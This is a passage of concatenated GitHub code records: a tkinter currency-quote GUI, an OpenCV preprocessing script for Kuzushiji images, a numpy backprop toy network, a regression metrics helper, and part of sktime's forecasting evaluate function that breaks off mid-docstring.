pady=10, sticky=\"NSEW\")\r\n\r\n# Insere título da janela\r\njanela.title(\"Sistema de Cotação de Moedas\")\r\n\r\n# Configura a cor do backgorund da janela\r\njanela.configure(bg='#b0e0e6')\r\n\r\n# Ajuste automático de linha(s) e coluna(s)\r\njanela.rowconfigure([0, 12], weight=1)\r\njanela.columnconfigure(2, weight=1)\r\n\r\n# Cotação de 1 moeda específica\r\ntitulo1 = tk.Label(text=\"Cotação de 1 moeda específica\", fg='black', bg='#b0e0e6', borderwidth=2, relief='solid')\r\ntitulo1.grid(row=0, column=0, padx=10, pady=10, columnspan=3, sticky=\"NSEW\")\r\n\r\n# Seleciona moeda\r\nmensagem2 = tk.Label(text=\"Selecione a moeda que deseja consultar:\", fg='black', bg='#b0e0e6')\r\nmensagem2.grid(row=1, column=0, padx=10, pady=10, columnspan=2, sticky=\"NSEW\")\r\n\r\n# Insere data\r\nmensagem3 = tk.Label(text=\"Selecione o dia (DD/MM/AA) que deseja pegar a cotação:\", fg='black', bg='#b0e0e6')\r\nmensagem3.grid(row=2, column=0, padx=10, pady=10, columnspan=2, sticky=\"NSEW\")\r\n\r\n# Insere uma caixa de texto para que o usuário insira a data\r\ndata_cotacao = tk.Entry(fg='black', bg='white')\r\ndata_cotacao.grid(row=2, column=2, padx=10, pady=10, sticky=\"NSEW\")\r\n\r\n# Insere uma caixa de text para amsg de cotação\r\nmensagem_cotacao = tk.Label(text=\"\", fg='black', bg='#b0e0e6')\r\nmensagem_cotacao.grid(row=3, column=0, columnspan=2, padx=10, pady=10, sticky=\"NSEW\") # Adiciona o label à janela\r\n\r\n# Cria uma lista com as chaves do dicionário\r\nmoedas = []\r\nfor item in cod_moedas:\r\n moedas.append(cod_moedas[item])\r\n\r\nmoeda['values'] = moedas\r\n\r\n# Configurar a função de filtro para ser chamada sempre que o usuário digitar algo\r\nmoeda_var.trace('w', filter_combobox)\r\n\r\n# Botão de busca da cotação\r\nbotao_buscar_cotacao = tk.Button(text=\"Pegar Cotação\", fg='black', bg='#b0e0e6', command=buscar_cotacao)\r\nbotao_buscar_cotacao.grid(row=3, column=2, padx=10, pady=10,) # Adiciona o botão na janela\r\n\r\n# Cotação de Múltiplas Moedas\r\ntitulo2 = tk.Label(text=\"Cotação de Múltiplas Moedas\", fg='black', bg='#b0e0e6', borderwidth=2, relief='solid')\r\ntitulo2.grid(row=5, column=0, columnspan=3, padx=10, pady=10, sticky=\"NSEW\")\r\n\r\n# Seleciona arquivo\r\nmensagem_selecionar_arquivo = tk.Label(text=\"Selecione um arquivo em Excel com as moedas na coluna A:\", fg='black',\r\n bg='#b0e0e6')\r\nmensagem_selecionar_arquivo.grid(row=6, column=0, columnspan=2, padx=10, pady=10, sticky=\"NSEW\")\r\n\r\n# Botão para selecionar o arquivo\r\nbotao_selecionar_arquivo = tk.Button(text=\"Clique aqui para selecionar\", fg='black', bg='#b0e0e6',\r\n command=selecionar_arquivo)\r\nbotao_selecionar_arquivo.grid(row=6, column=2, padx=10, pady=10) # Adiciona o botão na janela\r\n\r\n# Caminho do arquivo\r\nmensagem_caminho_arquivo_entrada = tk.Label(text=\"Nenhum arquivo selecionado\", fg='black', bg='#b0e0e6', anchor='e')\r\nmensagem_caminho_arquivo_entrada.grid(row=7, column=0, columnspan=3, padx=10, pady=10, sticky=\"NSEW\")\r\n\r\n# Seleciona datas inicial e final\r\nmensagem_data_inicial = tk.Label(text=\"Data Inicial (DD/MM/AA):\", fg='black', bg='#b0e0e6')\r\nmensagem_data_inicial.grid(row=8, column=0, sticky=\"NSEW\")\r\n\r\ndata_inicial = tk.Entry(fg='black', bg='white') # Caixa txt data inicial\r\ndata_inicial.grid(row=8, column=2)\r\n\r\nmensagem_data_final = tk.Label(text=\"Data Final (DD/MM/AA):\", fg='black', bg='#b0e0e6')\r\nmensagem_data_final.grid(row=9, column=0, padx=10, pady=10, sticky=\"NSEW\")\r\n\r\ndata_final = tk.Entry(fg='black', bg='white') # Caixa txt data final\r\ndata_final.grid(row=9, column=2, padx=10, pady=10)\r\n\r\n# Botão para atualizar cotações\r\nbotao_atualizar_cotacao = tk.Button(text=\"Atualizar Cotações\", fg='black', bg='#b0e0e6', command=atualizar_cotacao)\r\nbotao_atualizar_cotacao.grid(row=11, column=0, padx=10, pady=10) # Adiciona o botão na janela\r\n\r\n# Msg de arquivo atualizado\r\nmensagem_arquivo_atualizado = tk.Label(text=\"\", fg='black', bg='#b0e0e6')\r\nmensagem_arquivo_atualizado.grid(row=11, column=1, padx=10, pady=10, columnspan=2, sticky=\"NSEW\")\r\n\r\n# Botão para fechar programa\r\nbotao_fechar_programa = tk.Button(text=\"Fechar\", fg='black', bg='#b0e0e6', command=janela.quit)\r\nbotao_fechar_programa.grid(row=12, column=2, padx=10, pady=10) # Adiciona o botão na janela\r\n\r\n# Roda o código continuamente permitindo que a janela fique continuamente na tela\r\njanela.mainloop()\r\n","repo_name":"alexandrehorst/alexandrehorst","sub_path":"Currency Converter/Mini_projeto_v4.py","file_name":"Mini_projeto_v4.py","file_ext":"py","file_size_in_byte":15990,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14490722030","text":"#Preprocessing all images in kuzushiji dataset\nimport numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt \nimport os\nfrom skimage.filters.rank import enhance_contrast\nfrom skimage.morphology import disk, ball\n\nplt.rcParams['figure.dpi'] = 250\n\n# All dataset\npath='/home/mauricio/Documents/Pytorch/kaggle-kuzushiji-2019/data/'\nfolder= ['train_images1'] #['train_images1', 'test_images1'] \n\n#Just small part of dataset\n#path= '/home/mauricio/Documents/Pytorch/Pre-processing_model/data/'\n#folder= ['train_ori', 'test_ori'] \n\ndef adapt_binarize(image_file, with_plot=False, gray_scale=True):\n image= image_file\n #gray= cv2.cvtColor(norm, cv2.COLOR_BGR2GRAY)\n if gray_scale is not True:\n image= cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n #th, image_b = cv2.threshold(src=image, thresh=thresh_val, maxval=255, type=cv2.THRESH_BINARY)\n #image_b= cv2.adaptiveThreshold(image, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 231, 51) #ADAPTIVE_THRESH_GAUSSIAN_C\n #image= cv2.cvtColor(image_file, cv2.COLOR_BGR2GRAY)\n image_b= cv2.adaptiveThreshold(image, 255, cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 231, 51) #ADAPTIVE_THRESH_GAUSSIAN_C\n if with_plot:\n cmap_val = None if not gray_scale else 'gray'\n fig, (ax1, ax2) = plt.subplots(nrows=1, ncols=2, figsize=(10, 20))\n \n ax1.axis(\"off\")\n ax1.title.set_text('Original')\n \n ax2.axis(\"off\")\n ax2.title.set_text(\"Binarized\")\n \n ax1.imshow(image, cmap=cmap_val)\n ax2.imshow(image_b, cmap=cmap_val)\n #return True\n return image_b\n\ndef filter(image):\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n thresh = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]\n\n # Morph open to remove noise\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (2,2))\n opening = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel, iterations=1)\n\n # Find contours and remove small noise\n cnts = cv2.findContours(opening, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n cnts = cnts[0] if len(cnts) == 2 else cnts[1]\n #print(cnts)\n for c in cnts:\n area = cv2.contourArea(c)\n if area < 20:\n cv2.drawContours(opening, [c], -1, 0, -1)\n\n # Invert and apply slight Gaussian blur\n return 255 - opening\n #result = cv2.GaussianBlur(result, (3,3), 0)\n\ndef binarize(image_file, thresh_val=127, tipo=cv2.THRESH_BINARY ,with_plot=False, gray_scale=True):\n image= image_file\n if gray_scale is not True:\n image= cv2.cvtColor(image_file, cv2.COLOR_BGR2GRAY)\n th, image_b = cv2.threshold(src=image, thresh=thresh_val, maxval=255, type=tipo)\n #image_b= cv2.adaptiveThreshold(image, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 221, 31)\n if with_plot:\n cmap_val = None if not gray_scale else 'gray'\n fig, (ax1, ax2) = plt.subplots(nrows=1, ncols=2, figsize=(10, 20))\n \n ax1.axis(\"off\")\n ax1.title.set_text('Original')\n \n ax2.axis(\"off\")\n ax2.title.set_text(\"threshold\")\n \n ax1.imshow(image, cmap=cmap_val)\n ax2.imshow(image_b, cmap=cmap_val)\n #return True\n return image_b\n\ndef filtering(image, filter_size=2):\n # Morph open to remove noise\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (filter_size,filter_size))\n opening = cv2.morphologyEx(image, cv2.MORPH_OPEN, kernel, iterations=1)\n\n # Find contours and remove small noise\n cnts = cv2.findContours(opening, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n cnts = cnts[0] if len(cnts) == 2 else cnts[1]\n #print(cnts)\n for c in cnts:\n area = cv2.contourArea(c)\n if area < 40:\n cv2.drawContours(opening, [c], -1, 0, -1)\n\n # Invert and apply slight Gaussian blur\n return opening\n\ndef morphologic_filter(image, kernel):\n gray= cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n enh = enhance_contrast(gray, disk(10))\n erosion = cv2.erode(enh,kernel,iterations = 1)\n bin22= binarize(erosion, thresh_val=115, tipo=cv2.THRESH_TOZERO) #THRESH_TOZERO #130\n #bin_dil= binarize(dilation, thresh_val=120, tipo=cv2.THRESH_BINARY+cv2.THRESH_OTSU) #THRESH_TOZERO #130\n bin33= adapt_binarize(bin22, gray_scale=True)\n return bin33\n\ndef morphologic2(image, kernel):\n normalizedImg = np.zeros(image.shape)\n norm= cv2.normalize(image, normalizedImg, alpha=0, beta=255,norm_type=cv2.NORM_MINMAX)\n gray= cv2.cvtColor(norm, cv2.COLOR_BGR2GRAY)\n #dst = cv2.fastNlMeansDenoisingColored(enh, None, 10, 15, 7, 8) # 10, 15, 7, 15-> 8\n #gray= cv2.cvtColor(img_o, cv2.COLOR_BGR2GRAY)\n enh = enhance_contrast(gray, disk(10))\n #kernel = np.ones((4,4),np.uint8)\n #erosion = cv2.erode(enh,kernel,iterations = 1)\n bin22= binarize(enh, thresh_val=115, tipo=cv2.THRESH_TOZERO) #THRESH_TOZERO #130\n #bin_dil= binarize(dilation, thresh_val=120, tipo=cv2.THRESH_BINARY+cv2.THRESH_OTSU) #THRESH_TOZERO #130\n bin33= adapt_binarize(bin22, gray_scale=True)\n return bin33\n\n \ndef preprocess(folder, output):\n kernel = np.ones((4,4),np.uint8)\n color_threshold= 35\n for filename in os.listdir(folder):\n img = cv2.imread(os.path.join(folder,filename))\n if img is not None:\n #get avg color\n avg_color_per_row = np.average(img, axis=0)\n avg_color = np.average(avg_color_per_row, axis=0)\n diff= avg_color[2]-avg_color[0]\n img= cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n if diff >= color_threshold:\n #Adaptive filter\n #en data as test_adaptive\n normalizedImg = np.zeros(img.shape)\n img= cv2.normalize(img, normalizedImg, alpha=0, beta=255,norm_type=cv2.NORM_MINMAX)\n dst = cv2.fastNlMeansDenoisingColored(img, None, 10, 10, 7, 15) \n erosion = cv2.erode(dst,kernel,iterations = 1)\n binarized= adapt_binarize(erosion, gray_scale=False) \n binarized= cv2.dilate(binarized,kernel,iterations = 1)\n \n # #threshold filter\n # dst = cv2.fastNlMeansDenoisingColored(img, None, 10, 15, 7, 8) # 10, 15, 7, 15-> 8\n # erosion = cv2.erode(dst,kernel,iterations = 1)\n # bin2= binarize(erosion, thresh_val=115, tipo=cv2.THRESH_TOZERO) #THRESH_TOZERO #130\n # #bin_dil= binarize(dilation, thresh_val=120, tipo=cv2.THRESH_BINARY+cv2.THRESH_OTSU) #THRESH_TOZERO #130\n # bin3= adapt_binarize(bin2, gray_scale=True)\n # result= cv2.dilate(bin3, kernel, iterations = 1)\n # binarized= filtering(result)\n \n # cv2.imwrite(output+ str(filename), binarized)\n # #print(\"color: \",filename)\n else:\n #binarized= binarize(img, thresh_val=127)\n binarized= morphologic2(img, kernel) \n cv2.imwrite(output+ str(filename), binarized)\n #print(\"b/w \",filename)\n \n \n \nfor loc in folder:\n print(loc.split(\"_\")[0]+'/')\n preprocess(path+loc, loc.split(\"_\")[0]+'/')\n print(\"DONE!\")\n \n \n #### 200022050-00014_2, 200022050-00004_2, 200021712-00062_1\n \n #todo: aplicar modo4 y grabar imagenes ","repo_name":"Shanoa00/preprocessing_mau","sub_path":"data/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":7288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6228591287","text":"import numpy as np\n\nbatch_size = 64\ninput_dim = 1000\nhidden_dim = 100\noutput_dim = 10\n\nX = np.random.randn(batch_size, input_dim)\nY = np.random.randn(batch_size, output_dim)\n\nw1 = np.random.randn(input_dim, hidden_dim)\nw2 = np.random.randn(hidden_dim, output_dim)\n\nlearning_rate = 1e-6\nfor it in range(500):\n h = X.dot(w1)\n h_relu = np.maximum(h, 0)\n y_pred = h_relu.dot(w2)\n\n loss = np.square(y_pred - Y).sum()\n print(it, loss)\n\n grad_y_pred = 2.0 * (y_pred - Y)\n grad_w2 = h_relu.T.dot(grad_y_pred)\n grad_h_relu = grad_y_pred.dot(w2.T)\n grad_h = grad_h_relu.copy()\n grad_h[h < 0] = 0\n grad_w1 = X.T.dot(grad_h)\n\n w1 -= learning_rate * grad_w1\n w2 -= learning_rate * grad_w2\n","repo_name":"andrewsilva9/pytorch-ramblings","sub_path":"basics/nptest.py","file_name":"nptest.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22170012800","text":"import pandas as pd\nimport numpy as np\nimport math\nfrom sklearn.metrics import r2_score, mean_squared_error\n\n# X_test, y_test[target],y_test['Prediction']\ndef accuracy_table(df, target, prediction):\n # Global model accuracy metrics\n measures = ['MSE','RMSE','R2', 'Adj R2']\n\n n = len(df)\n p = len(df.columns)\n\n mse_value = mean_squared_error(target, prediction)\n rmse_value = math.sqrt(mse_value) \n R2 = r2_score(target, prediction)\n AdjR2 = 1-(1-R2)*(n-1)/(n-p-1)\n\n scores = [mse_value, rmse_value, R2, AdjR2]\n accuracytable = pd.DataFrame({'Measure': measures, 'Value': scores})\n\n return accuracytable","repo_name":"tzimmer3/ModelScoring","sub_path":"bin/Continuous_Model/bin/Continuous_Accuracy_Table.py","file_name":"Continuous_Accuracy_Table.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33997875550","text":"__author__ = [\"aiwalter\", \"mloning\", \"fkiraly\", \"topher-lo\"]\n__all__ = [\"evaluate\"]\n\nimport time\nimport warnings\nfrom typing import Dict, List, Optional, Union\n\nimport numpy as np\nimport pandas as pd\n\nfrom sktime.datatypes import check_is_scitype, convert_to\nfrom sktime.exceptions import FitFailedWarning\nfrom sktime.forecasting.base import ForecastingHorizon\nfrom sktime.utils.parallel import parallelize\nfrom sktime.utils.validation._dependencies import _check_soft_dependencies\nfrom sktime.utils.validation.forecasting import check_cv, check_scoring\n\nPANDAS_MTYPES = [\"pd.DataFrame\", \"pd.Series\", \"pd-multiindex\", \"pd_multiindex_hier\"]\n\n\ndef _check_strategy(strategy):\n \"\"\"Assert strategy value.\n\n Parameters\n ----------\n strategy : str\n strategy of how to evaluate a forecaster\n must be in \"refit\", \"update\" , \"no-update_params\"\n\n Raises\n ------\n ValueError\n If strategy value is not in expected values, raise error.\n \"\"\"\n valid_strategies = (\"refit\", \"update\", \"no-update_params\")\n if strategy not in valid_strategies:\n raise ValueError(f\"`strategy` must be one of {valid_strategies}\")\n\n\ndef _check_scores(metrics) -> Dict:\n \"\"\"Validate and coerce to BaseMetric and segregate them based on predict type.\n\n Parameters\n ----------\n metrics : sktime accepted metrics object or a list of them or None\n\n Return\n ------\n metrics_type : Dict\n The key is metric types and its value is a list of its corresponding metrics.\n \"\"\"\n if not isinstance(metrics, List):\n metrics = [metrics]\n\n metrics_type = {}\n for metric in metrics:\n metric = check_scoring(metric)\n # collect predict type\n if hasattr(metric, \"get_tag\"):\n scitype = metric.get_tag(\n \"scitype:y_pred\", raise_error=False, tag_value_default=\"pred\"\n )\n else: # If no scitype exists then metric is a point forecast type\n scitype = \"pred\"\n if scitype not in metrics_type.keys():\n metrics_type[scitype] = [metric]\n else:\n metrics_type[scitype].append(metric)\n return metrics_type\n\n\ndef _get_column_order_and_datatype(\n metric_types: Dict, return_data: bool = True, cutoff_dtype=None, old_naming=True\n) -> Dict:\n \"\"\"Get the ordered column name and input datatype of results.\"\"\"\n others_metadata = {\n \"len_train_window\": \"int\",\n \"cutoff\": cutoff_dtype,\n }\n y_metadata = {\n \"y_train\": \"object\",\n \"y_test\": \"object\",\n }\n fit_metadata, metrics_metadata = {\"fit_time\": \"float\"}, {}\n for scitype in metric_types:\n for metric in metric_types.get(scitype):\n pred_args = _get_pred_args_from_metric(scitype, metric)\n if pred_args == {} or old_naming:\n time_key = f\"{scitype}_time\"\n result_key = f\"test_{metric.name}\"\n y_pred_key = f\"y_{scitype}\"\n else:\n argval = list(pred_args.values())[0]\n time_key = f\"{scitype}_{argval}_time\"\n result_key = f\"test_{metric.name}_{argval}\"\n y_pred_key = f\"y_{scitype}_{argval}\"\n fit_metadata[time_key] = \"float\"\n metrics_metadata[result_key] = \"float\"\n if return_data:\n y_metadata[y_pred_key] = \"object\"\n fit_metadata.update(others_metadata)\n if return_data:\n fit_metadata.update(y_metadata)\n metrics_metadata.update(fit_metadata)\n return metrics_metadata.copy()\n\n\n# should we remove _split since this is no longer being used?\ndef _split(\n y,\n X,\n train,\n test,\n freq=None,\n):\n # split data according to cv\n y_train, y_test = y.iloc[train], y.iloc[test]\n X_train, X_test = None, None\n\n if X is not None:\n # For X_test, we select the full range of test/train values.\n # for those transformers that change the size of input.\n test_plus_train = np.append(train, test)\n X_train, X_test = (\n X.iloc[train].sort_index(),\n X.iloc[test_plus_train].sort_index(),\n ) # Defensive sort\n\n # Defensive assignment of freq\n if freq is not None:\n try:\n if y_train.index.nlevels == 1:\n y_train.index.freq = freq\n y_test.index.freq = freq\n else:\n # See: https://github.com/pandas-dev/pandas/issues/33647\n y_train.index.levels[-1].freq = freq\n y_test.index.levels[-1].freq = freq\n except AttributeError: # Can't set attribute for range or period index\n pass\n\n if X is not None:\n try:\n if X.index.nlevels == 1:\n X_train.index.freq = freq\n X_test.index.freq = freq\n else:\n X_train.index.levels[-1].freq = freq\n X_test.index.levels[-1].freq = freq\n except AttributeError: # Can't set attribute for range or period index\n pass\n\n return y_train, y_test, X_train, X_test\n\n\ndef _select_fh_from_y(y):\n # create forecasting horizon\n # if cv object has fh, we use that\n idx = y.index\n # otherwise, if y_test is not hierarchical, we simply take the index of y_test\n if y.index.nlevels == 1:\n fh = ForecastingHorizon(idx, is_relative=False)\n # otherwise, y_test is hierarchical, and we take its unique time indices\n else:\n fh_idx = idx.get_level_values(-1).unique()\n fh = ForecastingHorizon(fh_idx, is_relative=False)\n return fh\n\n\ndef _get_pred_args_from_metric(scitype, metric):\n pred_args = {\n \"pred_quantiles\": \"alpha\",\n \"pred_interval\": \"coverage\",\n }\n if scitype in pred_args.keys():\n val = getattr(metric, pred_args[scitype], None)\n if val is not None:\n return {pred_args[scitype]: val}\n return {}\n\n\ndef _evaluate_window(x, meta):\n # unpack args\n i, (y_train, y_test, X_train, X_test) = x\n fh = meta[\"fh\"]\n forecaster = meta[\"forecaster\"]\n strategy = meta[\"strategy\"]\n scoring = meta[\"scoring\"]\n return_data = meta[\"return_data\"]\n error_score = meta[\"error_score\"]\n cutoff_dtype = meta[\"cutoff_dtype\"]\n\n # set default result values in case estimator fitting fails\n score = error_score\n fit_time = np.nan\n pred_time = np.nan\n cutoff = pd.Period(pd.NaT) if cutoff_dtype.startswith(\"period\") else pd.NA\n y_pred = pd.NA\n temp_result = dict()\n y_preds_cache = dict()\n old_naming = True\n old_name_mapping = {}\n if fh is None:\n fh = _select_fh_from_y(y_test)\n\n try:\n # fit/update\n start_fit = time.perf_counter()\n if i == 0 or strategy == \"refit\":\n forecaster = forecaster.clone()\n forecaster.fit(y=y_train, X=X_train, fh=fh)\n else: # if strategy in [\"update\", \"no-update_params\"]:\n update_params = strategy == \"update\"\n forecaster.update(y_train, X_train, update_params=update_params)\n fit_time = time.perf_counter() - start_fit\n\n # predict based on metrics\n pred_type = {\n \"pred_quantiles\": \"predict_quantiles\",\n \"pred_interval\": \"predict_interval\",\n \"pred_proba\": \"predict_proba\",\n \"pred\": \"predict\",\n }\n # cache prediction from the first scitype and reuse it to compute other metrics\n for scitype in scoring:\n method = getattr(forecaster, pred_type[scitype])\n if len(set(map(lambda metric: metric.name, scoring.get(scitype)))) != len(\n scoring.get(scitype)\n ):\n old_naming = False\n for metric in scoring.get(scitype):\n pred_args = _get_pred_args_from_metric(scitype, metric)\n if pred_args == {}:\n time_key = f\"{scitype}_time\"\n result_key = f\"test_{metric.name}\"\n y_pred_key = f\"y_{scitype}\"\n else:\n argval = list(pred_args.values())[0]\n time_key = f\"{scitype}_{argval}_time\"\n result_key = f\"test_{metric.name}_{argval}\"\n y_pred_key = f\"y_{scitype}_{argval}\"\n old_name_mapping[f\"{scitype}_{argval}_time\"] = f\"{scitype}_time\"\n old_name_mapping[\n f\"test_{metric.name}_{argval}\"\n ] = f\"test_{metric.name}\"\n old_name_mapping[f\"y_{scitype}_{argval}\"] = f\"y_{scitype}\"\n\n # make prediction\n if y_pred_key not in y_preds_cache.keys():\n start_pred = time.perf_counter()\n y_pred = method(fh, X_test, **pred_args)\n pred_time = time.perf_counter() - start_pred\n temp_result[time_key] = [pred_time]\n y_preds_cache[y_pred_key] = [y_pred]\n else:\n y_pred = y_preds_cache[y_pred_key][0]\n\n score = metric(y_test, y_pred, y_train=y_train)\n temp_result[result_key] = [score]\n\n # get cutoff\n cutoff = forecaster.cutoff\n\n except Exception as e:\n if error_score == \"raise\":\n raise e\n else: # assign default value when fitting failed\n for scitype in scoring:\n temp_result[f\"{scitype}_time\"] = [pred_time]\n if return_data:\n temp_result[f\"y_{scitype}\"] = [y_pred]\n for metric in scoring.get(scitype):\n temp_result[f\"test_{metric.name}\"] = [score]\n warnings.warn(\n f\"\"\"\n In evaluate, fitting of forecaster {type(forecaster).__name__} failed,\n you can set error_score='raise' in evaluate to see\n the exception message.\n Fit failed for the {i}-th data split, on training data y_train with\n cutoff {cutoff}, and len(y_train)={len(y_train)}.\n The score will be set to {error_score}.\n Failed forecaster with parameters: {forecaster}.\n \"\"\",\n FitFailedWarning,\n stacklevel=2,\n )\n\n if pd.isnull(cutoff):\n cutoff_ind = cutoff\n else:\n cutoff_ind = cutoff[0]\n\n # Storing the remaining evaluate detail\n temp_result[\"fit_time\"] = [fit_time]\n temp_result[\"len_train_window\"] = [len(y_train)]\n temp_result[\"cutoff\"] = [cutoff_ind]\n if return_data:\n temp_result[\"y_train\"] = [y_train]\n temp_result[\"y_test\"] = [y_test]\n temp_result.update(y_preds_cache)\n result = pd.DataFrame(temp_result)\n result = result.astype({\"len_train_window\": int, \"cutoff\": cutoff_dtype})\n if old_naming:\n result = result.rename(columns=old_name_mapping)\n column_order = _get_column_order_and_datatype(\n scoring, return_data, cutoff_dtype, old_naming=old_naming\n )\n result = result.reindex(columns=column_order.keys())\n\n # Return forecaster if \"update\"\n if strategy == \"update\" or (strategy == \"no-update_params\" and i == 0):\n return result, forecaster\n else:\n return result\n\n\n# todo 0.25.0: remove compute argument and docstring\n# todo 0.25.0: remove kwargs and docstring\ndef evaluate(\n forecaster,\n cv,\n y,\n X=None,\n strategy: str = \"refit\",\n scoring: Optional[Union[callable, List[callable]]] = None,\n return_data: bool = False,\n error_score: Union[str, int, float] = np.nan,\n backend: Optional[str] = None,\n compute: bool = None,\n cv_X=None,\n backend_params: Optional[dict] = None,\n **kwargs,\n):\n r\"\"\"Evaluate forecaster using timeseries cross-validation.\n\n All-in-one statistical performance benchmarking utility for forecasters\n which runs a simple backtest experiment and returns a summary pd.DataFrame.\n\n The experiment run is the following:\n\n Denote by :math:`y_{train, 1}, y_{test, 1}, \\dots, y_{train, K}, y_{test, K}`\n the train/test folds produced by the generator ``cv.split_series(y)``.\n Denote by :math:`X_{train, 1}, X_{test, 1}, \\dots, X_{train, K}, X_{test, K}`\n the train/test folds produced by the generator ``cv_X.split_series(X)``\n (if ``X`` is ``None``, consider these to be ``None`` as well).\n\n 1. Set ``i = 1``\n 2. Fit the ``forecaster`` to :math:`y_{train, 1}`, :math:`X_{train, 1}`,\n with a ``fh`` to forecast :math:`y_{test, 1}`\n 3. The ``forecaster`` predict with exogeneous data :math:`X_{test, i}`\n ``y_pred = forecaster.predict`` (or ``predict_proba`` or ``predict_quantiles``,\n depending on ``scoring``)\n 4. Compute ``scoring`` on ``y_pred`` versus :math:`y_{test, 1}`\n 5. If ``i == K``, terminate, otherwise\n 6. Set ``i = i + 1``\n 7. Ingest more data :math:`y_{train, i}`, :math:`X_{train, i}`,\n how depends on ``strategy``:\n\n - if ``strategy == \"refit\"``, reset and fit ``forecaster`` via ``fit``,\n on :math:`y_{train, i}`, :math:`X_{train, i}` to forecast :math:`y_{test, i}`\n - if ``strategy == \"update\"``, update ``forecaster`` via ``update``,\n on :math:`y_{train, i}`, :math:`X_{train, i}` to forecast :math:`y_{test, i}`\n - if ``strategy == \"no-update_params\"``, forward ``forecaster`` via ``update``,\n with argument ``update_params=False``, to the cutoff of :math:`y_{train, i}`\n\n 8. Go to 3\n\n Results returned in this function's return are:\n\n * results of ``scoring`` calculations, from 4, in the `i`-th loop\n * runtimes for fitting and/or predicting, from 2, 3, 7, in the `i`-th loop\n * cutoff state of ``forecaster``, at 3, in the `i`-th loop\n * :math:`y_{train, i}`, :math:`y_{test, i}`, ``y_pred`` (optional)\n\n A distributed and-or parallel back-end can be chosen via the ``backend`` parameter.\n\n Parameters\n ----------\n forecaster : sktime BaseForecaster descendant (concrete forecaster)\n sktime forecaster to benchmark\n cv : sktime BaseSplitter descendant\n determines split of ``y`` and possibly ``X`` into test and train folds\n y is always split according to ``cv``, see above\n if ``cv_X`` is not passed, ``X`` splits are subset to ``loc`` equal to ``y``\n if ``cv_X`` is passed, ``X`` is split according to ``cv_X``\n y : sktime time series container\n Target (endogeneous) time series used in the evaluation experiment\n X : sktime time series container, of same mtype as y\n Exogenous time series used in the evaluation experiment\n strategy : {\"refit\", \"update\", \"no-update_params\"}, optional, default=\"refit\"\n defines the ingestion mode when the forecaster sees new data when window expands\n \"refit\" = forecaster is refitted to each training window\n \"update\" = forecaster is updated with training window data, in sequence provided\n \"no-update_params\" = fit to first training window, re-used without fit or update\n scoring : subclass of sktime.performance_metrics.BaseMetric or list of same,\n default=None. Used to get a score function that takes y_pred and y_test\n arguments and accept y_train as keyword argument.\n If None, then uses scoring = MeanAbsolutePercentageError(symmetric=True).\n return_data : bool, default=False\n Returns three additional columns in the DataFrame, by default False.\n The cells of the columns contain each a pd.Series for y_train,\n y_pred, y_test.\n error_score : \"raise\" or numeric, default=np.nan\n Value to assign to the score if an exception occurs in estimator fitting. If set\n to \"raise\", the exception is raised. If a numeric value is given,\n FitFailedWarning is raised.\n backend : {\"dask\", \"loky\", \"multiprocessing\", \"threading\"}, by default None.\n Runs parallel evaluate if specified and `strategy` is set as \"refit\".\n\n - \"None\": executes loop sequentally, simple list comprehension\n - \"loky\", \"multiprocessing\" and \"threading\": uses ``joblib.Parallel`` loops\n - \"dask\": uses ``dask``, requires ``dask`` package in environment\n - \"dask_lazy\": same as \"dask\",\n but changes the return to (lazy) ``dask.dataframe.DataFrame``.\n\n Recommendation: Use \"dask\" or \"loky\" for parallel evaluate.\n \"threading\" is unlikely to see speed ups due to the GIL and the serialization\n backend (``cloudpickle``) for \"dask\" and \"loky\" is generally more robust\n than the standard ``pickle`` library used in \"multiprocessing\".\n compute : bool, default=True, deprecated and will be removed in 0.25.0.\n If backend=\"dask\", whether returned DataFrame is computed.\n If set to True, returns `pd.DataFrame`, otherwise `dask.dataframe.DataFrame`.\n cv_X : sktime BaseSplitter descendant, optional\n determines split of ``X`` into test and train folds\n default is ``X`` being split to identical ``loc`` indices as ``y``\n if passed, must have same number of splits as ``cv``\n\n backend_params : dict, optional\n additional parameters passed to the backend as config.\n Directly passed to ``utils.parallel.parallelize``.\n Valid keys depend on the value of ``backend``:\n\n - \"None\": no additional parameters, ``backend_params`` is ignored\n - \"loky\", \"multiprocessing\" and \"threading\":\n any valid keys for ``joblib.Parallel`` can be passed here,\n e.g., ``n_jobs``, with the exception of ``backend``\n which is directly controlled by ``backend``\n - \"dask\": any valid keys for ``dask.compute`` can be passed,\n e.g., ``scheduler``\n\n Returns\n -------\n results : pd.DataFrame or dask.dataframe.DataFrame\n DataFrame that contains several columns with information regarding each\n refit/update and prediction of the forecaster.\n Row index is splitter index of train/test fold in `cv`.\n Entries in the i-th row are for the i-th train/test split in `cv`.\n Columns are as follows:\n\n - test_{scoring.name}: (float) Model performance score. If `scoring` is a list,\n then there is a column withname `test_{scoring.name}` for each scorer.\n\n - fit_time: (float) Time in sec for `fit` or `update` on train fold.\n - pred_time: (float) Time in sec to `predict` from fitted estimator.\n - len_train_window: (int) Length of train window.\n - cutoff: (int, pd.Timestamp, pd.Period) cutoff = last time index in train fold.\n - y_train: (pd.Series) only present if see `return_data=True`\n train fold of the i-th split in `cv`, used to 